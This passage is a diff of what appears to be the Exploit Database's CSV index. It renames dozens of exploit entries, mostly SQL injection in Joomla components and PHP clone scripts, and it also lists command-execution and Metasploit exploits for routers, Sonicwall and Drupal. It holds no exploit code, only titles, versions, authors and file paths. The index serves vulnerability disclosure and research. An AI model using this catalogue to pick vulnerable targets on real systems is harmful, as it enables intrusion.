Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41333,platforms/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41334,platforms/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41335,platforms/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41336,platforms/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41337,platforms/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41338,platforms/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41337,platforms/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41338,platforms/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41339,platforms/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41340,platforms/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41340,platforms/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41341,platforms/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41342,platforms/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41343,platforms/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41344,platforms/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 -41345,platforms/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' Parameter SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41342,platforms/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41343,platforms/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41344,platforms/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 +41345,platforms/php/webapps/41345.txt,"Joomla! Component JE Portfolio Creator 1.2 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41346,platforms/php/webapps/41346.txt,"Joomla! Component JE Ticket System 1.2 - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41347,platforms/php/webapps/41347.txt,"Joomla! Component JE Messanger - SQL Injection",2017-02-13,"Ihsan Sencan",php,webapps,0 41359,platforms/php/webapps/41359.txt,"Itech B2B Script 4.29 - Multiple Vulnerabilities",2017-02-12,"Marc Castejon",php,webapps,0 41360,platforms/hardware/webapps/41360.rb,"Geutebruck 5.02024 G-Cam/EFD-2250 - Remote Command Execution (Metasploit)",2017-02-15,RandoriSec,hardware,webapps,0 41361,platforms/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps,0 41362,platforms/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 -41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 +41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0 41371,platforms/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 41372,platforms/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 41373,platforms/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 @@ -37975,14 +37976,14 @@ id,file,description,date,author,platform,type,port 41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0 41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80 41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0 -41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 -41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 -41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 -41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 -41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0 +41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 -41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 +41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0 @@ -37992,16 +37993,16 @@ id,file,description,date,author,platform,type,port 41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0 41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0 41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0 -41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 -41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' Parameter SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 +41399,platforms/php/webapps/41399.txt,"Joomla! Component MaQma Helpdesk 4.2.7 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 +41400,platforms/php/webapps/41400.txt,"Joomla! Component PayPal IPN for DOCman 3.1 - 'id' SQL Injection",2017-02-20,"Ihsan Sencan",php,webapps,0 41401,platforms/ios/webapps/41401.txt,"Album Lock 4.0 iOS - Directory Traversal",2017-02-20,Vulnerability-Lab,ios,webapps,0 41402,platforms/hardware/webapps/41402.txt,"Tenda N3 Wireless N150 Router - Authentication Bypass",2015-09-03,"Mandeep Jadon",hardware,webapps,0 41595,platforms/php/webapps/41595.txt,"Car Workshop System - SQL Injection",2017-03-13,"Ihsan Sencan",php,webapps,0 41404,platforms/hardware/webapps/41404.html,"DIGISOL DG-HR1400 Wireless Router - Cross-Site Request Forgery",2017-02-21,Indrajith.A.N,hardware,webapps,0 -41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 -41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41405,platforms/php/webapps/41405.txt,"Joomla! Component J-HotelPortal 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41406,platforms/php/webapps/41406.txt,"Joomla! Component J-CruiseReservation Standard 3.0 - 'city' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 41407,platforms/php/webapps/41407.txt,"Joomla! Component Eventix Events Calendar 1.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 -41408,platforms/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' Parameter SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 +41408,platforms/php/webapps/41408.txt,"Joomla! Component J-MultipleHotelReservation Standard 6.0.2 - 'review_id' SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 41409,platforms/php/webapps/41409.txt,"Joomla! Component Directorix Directory Manager 1.1.1 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 41410,platforms/php/webapps/41410.txt,"Joomla! Component Magic Deals Web 1.2.0 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 41411,platforms/php/webapps/41411.txt,"Joomla! Component J-BusinessDirectory 4.6.8 - SQL Injection",2017-02-21,"Ihsan Sencan",php,webapps,0 @@ -38011,7 +38012,7 @@ id,file,description,date,author,platform,type,port 41415,platforms/hardware/webapps/41415.rb,"Sonicwall 8.1.0.2-14sv - 'extensionsettings.cgi' Remote Command Injection (Metasploit)",2016-12-25,xort,hardware,webapps,0 41416,platforms/hardware/webapps/41416.rb,"Sonicwall 8.1.0.2-14sv - 'viewcert.cgi' Remote Command Injection (Metasploit)",2016-12-24,xort,hardware,webapps,0 41424,platforms/php/webapps/41424.rb,"AlienVault OSSIM/USM < 5.3.1 - Remote Code Execution (Metasploit)",2017-01-31,"Mehmet Ince",php,webapps,0 -41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' Parameter SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0 +41427,platforms/php/webapps/41427.txt,"Joomla! Component ContentMap 1.3.8 - 'contentid' SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0 41428,platforms/php/webapps/41428.txt,"Joomla! Component VehicleManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0 41429,platforms/php/webapps/41429.txt,"Joomla! Component RealEstateManager 3.9 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0 41430,platforms/php/webapps/41430.txt,"Joomla! Component BookLibrary 3.6.1 - SQL Injection",2017-02-22,"Ihsan Sencan",php,webapps,0 @@ -38036,7 +38037,7 @@ id,file,description,date,author,platform,type,port 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0 41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0 -41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0 41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 @@ -38046,7 +38047,7 @@ id,file,description,date,author,platform,type,port 41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0 41472,platforms/hardware/webapps/41472.html,"NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery",2017-02-28,SivertPL,hardware,webapps,0 41478,platforms/hardware/webapps/41478.txt,"D-Link DSL-2730U Wireless N 150 - Cross-Site Request Forgery",2017-03-01,"B GOVIND",hardware,webapps,0 -41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41492,platforms/php/webapps/41492.txt,"Php Classified OLX Clone Script - 'category' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41482,platforms/xml/webapps/41482.txt,"Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting",2017-03-01,"SEC Consult",xml,webapps,0 41483,platforms/php/webapps/41483.html,"WordPress Plugin Contact Form Manager - Cross-Site Request Forgery / Cross-Site Scripting",2017-03-01,"Edwin Molenaar",php,webapps,80 41484,platforms/php/webapps/41484.txt,"WordPress Plugin User Login Log 2.2.1 - Cross-Site Scripting",2017-03-01,"Axel Koolhaas",php,webapps,80 @@ -38056,34 +38057,34 @@ id,file,description,date,author,platform,type,port 41488,platforms/php/webapps/41488.html,"WordPress Plugin File Manager 3.0.1 - Cross-Site Request Forgery",2017-03-01,"David Vaartjes",php,webapps,80 41489,platforms/php/webapps/41489.txt,"SchoolDir - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 41490,platforms/php/webapps/41490.txt,"Rage Faces Script 1.3 - SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 -41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' Parameter SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 +41491,platforms/php/webapps/41491.txt,"Meme Maker Script 2.1 - 'user' SQL Injection",2017-03-01,"Ihsan Sencan",php,webapps,0 41493,platforms/php/webapps/41493.txt,"Joomla! Component Abstract 2.1 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 -41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 -41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 +41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0 41497,platforms/php/webapps/41497.php,"WordPress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0 41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0 41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0 41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0 41502,platforms/hardware/webapps/41502.txt,"EPSON TMNet WebConfig 1.00 - Cross-Site Scripting",2017-03-03,"Michael Benich",hardware,webapps,0 -41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 -41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 -41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 +41504,platforms/php/webapps/41504.txt,"Joomla! Component JUX EventOn 1.0.1 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 +41505,platforms/php/webapps/41505.txt,"Joomla! Component Monthly Archive 3.6.4 - 'author_form' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 +41506,platforms/php/webapps/41506.txt,"Joomla! Component AYS Quiz 1.0 - 'id' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 41507,platforms/php/webapps/41507.txt,"Joomla! Component Content ConstructionKit 1.1 - SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 -41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' Parameter SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 +41508,platforms/php/webapps/41508.txt,"Joomla! Component AltaUserPoints 1.1 - 'userid' SQL Injection",2017-03-04,"Ihsan Sencan",php,webapps,0 41512,platforms/php/webapps/41512.txt,"Advanced Bus Booking Script 2.04 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41513,platforms/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41514,platforms/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41513,platforms/php/webapps/41513.txt,"Entrepreneur Bus Booking Script 3.03 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41514,platforms/php/webapps/41514.txt,"Single Theater Booking Script - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41515,platforms/php/webapps/41515.txt,"Responsive Events & Movie Ticket Booking Script - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41516,platforms/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41517,platforms/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41518,platforms/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41519,platforms/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41516,platforms/php/webapps/41516.txt,"Online Cinema and Event Booking Script 2.01 - 'newsid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41517,platforms/php/webapps/41517.txt,"Redbus Clone Script 3.05 - 'hid_Busid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41518,platforms/php/webapps/41518.txt,"Groupon Clone Script 3.01 - 'catid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41519,platforms/php/webapps/41519.txt,"Naukri Clone Script 3.02 - 'type' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41520,platforms/php/webapps/41520.txt,"Yellow Pages Clone Script 1.3.4 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41521,platforms/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41522,platforms/php/webapps/41522.txt,"Advanced Real Estate Script 4.0.6 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41523,platforms/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41524,platforms/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41523,platforms/php/webapps/41523.txt,"PHP Classifieds Rental Script 3.6.0 - 'scatid' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41524,platforms/php/webapps/41524.txt,"Entrepreneur B2B Script 2.0.4 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41525,platforms/php/webapps/41525.txt,"PHP Matrimonial Script 3.0 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41526,platforms/php/webapps/41526.txt,"MLM Binary Plan Script 2.0.5 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41527,platforms/php/webapps/41527.txt,"MLM Forced Matrix 2.0.7 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 @@ -38093,14 +38094,14 @@ id,file,description,date,author,platform,type,port 41531,platforms/php/webapps/41531.txt,"Network Community Script 3.0.2 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41532,platforms/php/webapps/41532.txt,"PHP B2B Script 3.05 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41533,platforms/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41534,platforms/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41534,platforms/php/webapps/41534.txt,"Schools Alert Management Script 2.01 - 'list_id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41535,platforms/php/webapps/41535.txt,"Select Your College Script 2.01 - SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41536,platforms/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 -41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' Parameter SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41536,platforms/php/webapps/41536.txt,"Social Network Script 3.01 - 'id' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 +41539,platforms/php/webapps/41539.txt,"Website Broker Script 3.02 - 'view' SQL Injection",2017-03-06,"Ihsan Sencan",php,webapps,0 41540,platforms/php/webapps/41540.py,"WordPress Multiple Plugins - Arbitrary File Upload",2017-03-03,"The Martian",php,webapps,0 41541,platforms/json/webapps/41541.html,"Deluge Web UI 1.3.13 - Cross-Site Request Forgery",2017-03-06,"Kyle Neideck",json,webapps,0 -41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 -41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 +41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 +41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0 41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0 41548,platforms/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0 41549,platforms/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0 @@ -38110,12 +38111,12 @@ id,file,description,date,author,platform,type,port 41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0 41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0 41556,platforms/php/webapps/41556.txt,"Country on Sale Script - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 -41557,platforms/php/webapps/41557.txt,"Media Search Engine Script - 'search' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 -41558,platforms/php/webapps/41558.txt,"Soundify 1.1 - 'tid' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 -41559,platforms/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 +41557,platforms/php/webapps/41557.txt,"Media Search Engine Script - 'search' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 +41558,platforms/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 +41559,platforms/php/webapps/41559.txt,"BistroStays 3.0 - 'guests' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 41560,platforms/php/webapps/41560.txt,"Nlance 2.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 41561,platforms/php/webapps/41561.txt,"Busewe 1.2 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 -41562,platforms/php/webapps/41562.txt,"Fashmark 1.2 - 'category' Parameter SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 +41562,platforms/php/webapps/41562.txt,"Fashmark 1.2 - 'category' SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 41563,platforms/php/webapps/41563.txt,"TradeMart 1.1 - SQL Injection",2017-03-09,"Ihsan Sencan",php,webapps,0 41564,platforms/php/webapps/41564.php,"Drupal 7.x Module Services - Remote Code Execution",2017-03-09,"Charles Fol",php,webapps,0 41566,platforms/php/webapps/41566.txt,"WordPress Plugin Mac Photo Gallery 3.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",php,webapps,0 @@ -38142,11 +38143,11 @@ id,file,description,date,author,platform,type,port 41587,platforms/php/webapps/41587.txt,"Property Listing Script 3.1 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41588,platforms/php/webapps/41588.txt,"Travel Tours Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41589,platforms/php/webapps/41589.txt,"Yacht Listing Script 2.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 -41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' Parameter SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 +41590,platforms/php/webapps/41590.txt,"Yellow Pages Script 3.2 - 'category_id' SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41591,platforms/php/webapps/41591.txt,"PHP Forum Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",php,webapps,0 41594,platforms/php/webapps/41594.txt,"Fiyo CMS 2.0.6.1 - Privilege Escalation",2017-03-11,rungga_reksya,php,webapps,0 -41599,platforms/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0 -41600,platforms/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' Parameter SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0 +41599,platforms/php/webapps/41599.txt,"Joomla! Component Simple Membership 3.3.3 - 'userId' SQL Injection",2017-03-14,"Ihsan Sencan",php,webapps,0 +41600,platforms/php/webapps/41600.txt,"Joomla! Component Advertisement Board 3.0.4 - 'id' SQL Injection",2017-03-14,"Ihsan 